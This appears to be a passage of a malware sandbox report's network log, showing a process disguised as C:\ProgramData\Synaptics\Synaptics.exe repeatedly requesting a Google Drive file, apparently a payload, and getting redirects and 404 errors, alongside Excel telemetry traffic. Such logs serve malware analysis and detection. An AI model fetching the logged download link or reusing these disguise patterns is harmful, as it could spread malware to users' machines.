                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.1649769142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:37 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-v-Tv71rpTdHM6y1zIecmhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.1649772142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:38 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TFk4-tMSrQahTJaAkxLfOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.1649773142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:39 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:39 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EgrMCGhrmLQahhkRUwERpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC7Wo2brYXRJwVxL_l2i0-lTcBXlfxR5iGrJWNm24tMZaMhpUB2_xZnTIjlJWI6tEPBoN0oVN_8OvQ
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:39 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:39 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 4b 6b 63 4e 76 78 6d 5a 76 42 35 5a 36 53 50 50 54 61 5a 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="-KkcNvxmZvB5Z6SPPTaZmg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:39 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.1649774142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:39 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-xT9tYbUyutAKCxVmQnfPLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.1649775142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:39 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:39 GMT
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AXOcV9wyGwdCymktj_6gUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY2fNxGDNaLGlwv-TJfxyGE-cwJpC7cWl4Fq3oUL2VGdOdkwx4vIOliYlofWiMOgEaUQWyYLSHMGrQ
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:39 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:39 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 56 54 73 35 79 6a 4c 41 4b 4a 6c 54 54 31 34 45 75 46 6a 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="4VTs5yjLAKJlTT14EuFjEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:39 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.1649777142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:39 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:40 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VVKpO6wgkDxMklZ8U1MFJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.1649778142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.1649779142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.1649780142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.164978113.107.246.454435892C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:40 UTC219OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Accept-Encoding: gzip
                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                            Host: otelrules.azureedge.net
                                                                                                            2024-11-15 10:24:40 UTC493INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 15 Nov 2024 10:24:40 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 1112622
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Cache-Control: public
                                                                                                            Last-Modified: Wed, 13 Nov 2024 23:49:45 GMT
                                                                                                            ETag: "0x8DD043DD9F4DFDD"
                                                                                                            x-ms-request-id: 490adc63-101e-0046-0389-3691b0000000
                                                                                                            x-ms-version: 2018-03-28
                                                                                                            x-azure-ref: 20241115T102440Z-16547b76f7flf9g6hC1DFWmcx80000000ak0000000005xa1
                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                            X-Cache-Info: L1_T2
                                                                                                            X-Cache: TCP_HIT
                                                                                                            Accept-Ranges: bytes
                                                                                                            2024-11-15 10:24:40 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                                                                                            Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
